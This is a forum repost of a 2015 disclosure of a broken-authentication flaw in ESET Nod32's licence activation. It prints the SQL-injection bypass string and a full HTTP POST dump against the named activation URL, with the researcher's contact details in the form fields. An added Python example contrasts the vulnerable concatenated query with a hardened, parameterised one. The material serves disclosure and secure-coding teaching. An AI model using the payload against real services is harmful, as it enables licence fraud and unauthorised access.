MrGrj, posted May 17, 2015 (edited)

Security Researcher discovers Vulnerability in ESET Nod32 Antivirus License authentication system which generates free license (username and password)

With so many worms and trojans out in the open, every computer user would like to have an Antivirus on board his/her PC, but it would be really nice to have a paid version of an Antivirus for free. No, this is not a giveaway, but a researcher has discovered a serious vulnerability in the ESET Nod32 licensed version which allows hackers to use it for a full year without paying.

Security researcher Mohamed Abdelbaset Elnoby has discovered a vulnerability in the ESET Nod32 licensed version authentication that allows potential hackers to generate millions of usernames and passwords without a hitch.

Elnoby has dubbed the authentication bug as "hilarious" and he states that, "Hilarious Broken Authentication bug I found in ESET website specifically in their "Antivirus Product Activation Process" that allowed me to generate millions of valid paid Licenses of "ESET Nod32 Antivirus" as per their description "Our award-winning security software offers the most effective protection available today" for free."

The exploit of generating unlimited usernames and passwords for ESET Nod32 is caused by a broken authentication bug. While most applications require authentication to gain access to private information or to execute tasks, not every authentication method is able to provide adequate security. Negligence, ignorance, or simple understatement of security threats often result in authentication schemes that can be bypassed by simply skipping the login page and directly calling an internal page that is supposed to be accessed only after authentication has been performed.
Elnoby discovered that there are several ways of bypassing the ESET Nod32 authentication, such as:

[*] Direct page request (forced browsing)
[*] Parameter modification
[*] Session ID prediction
[*] SQL injection

The PoC of the bug is given below:

[*] Vulnerability Type: A2 – Broken Authentication and Session Management
[*] URL / Service: http://eu-eset.com/me/activate/reg/
[*] Vulnerable Parameter(s) / Input(s): "serial" (Product Key field)
[*] Payload / Bypass string: ' OR '''
[*] Request full dump:

POST /me/activate/reg/ HTTP/1.1
Host: eu-eset.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: Activate ESET Software
Cookie: [*]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25242107630722
Content-Length: 885

-----------------------------25242107630722
Content-Disposition: form-data; name="serial"

' OR '''
-----------------------------25242107630722
Content-Disposition: form-data; name="country"

20
-----------------------------25242107630722
Content-Disposition: form-data; name="firstname"

Mohamed
-----------------------------25242107630722
Content-Disposition: form-data; name="lastname"

Abdelbaset
-----------------------------25242107630722
Content-Disposition: form-data; name="company"

Seekurity
-----------------------------25242107630722
Content-Disposition: form-data; name="email"

SymbianSyMoh@Outlook.com
-----------------------------25242107630722
Content-Disposition: form-data; name="phone"

12345678911
-----------------------------25242107630722
Content-Disposition: form-data; name="note"


-----------------------------25242107630722--

Source of sources

Edited May 17, 2015 by MrGrj
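The injection in the "serial" field of the request above, as an added example that is not part of the original post or of ESET's code: a lookup that concatenates the product key into its SQL, beside a hardened lookup that allowlists the key format and binds the key as a parameter. The licence table, the key format and the usernames are constructed assumptions; the post does not describe the real backend.

```python
import re
import sqlite3

# Constructed licence table standing in for the activation backend; the real
# schema is not described in the post, so this is an assumption.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE licenses (serial TEXT PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO licenses VALUES (?, ?, ?)", [
        ("AAAA-BBBB-CCCC-DDDD", "EAV-00000001", "constructed-pw-1"),
        ("EEEE-FFFF-GGGG-HHHH", "EAV-00000002", "constructed-pw-2"),
    ])
    return db

# The bypass string from the post, exactly as it appeared in the "serial" field.
PAYLOAD = "' OR '''"

def vulnerable_query(serial):
    # Builds the statement by string formatting: the first quote in the form
    # value closes the literal, and the rest is parsed as SQL, not as a key.
    return "SELECT username, password FROM licenses WHERE serial = '%s'" % serial

def lookup_vulnerable(db, serial):
    # Executes whatever statement the user input produced. With PAYLOAD the
    # WHERE clause becomes   serial = '' OR ''''   which SQLite accepts as
    # valid SQL; here the extra operand is a non-numeric string, so it is
    # false and no row matches, but the statement is no longer the one the
    # developer wrote. Other engines may evaluate the rewritten clause differently.
    return db.execute(vulnerable_query(serial)).fetchall()

# Assumed key format (hypothetical): four dash-separated groups of four alphanumerics.
SERIAL_RE = re.compile(r"[A-Z0-9]{4}(?:-[A-Z0-9]{4}){3}")

def lookup_hardened(db, serial):
    # Layer 1: allowlist the shape of a product key before touching the
    # database, so quotes and SQL keywords never get that far.
    if not SERIAL_RE.fullmatch(serial):
        return None
    # Layer 2: bind the key as a parameter; the driver passes it as data, so it
    # cannot change the statement's structure even if layer 1 is bypassed.
    return db.execute(
        "SELECT username, password FROM licenses WHERE serial = ?", (serial,)
    ).fetchone()
```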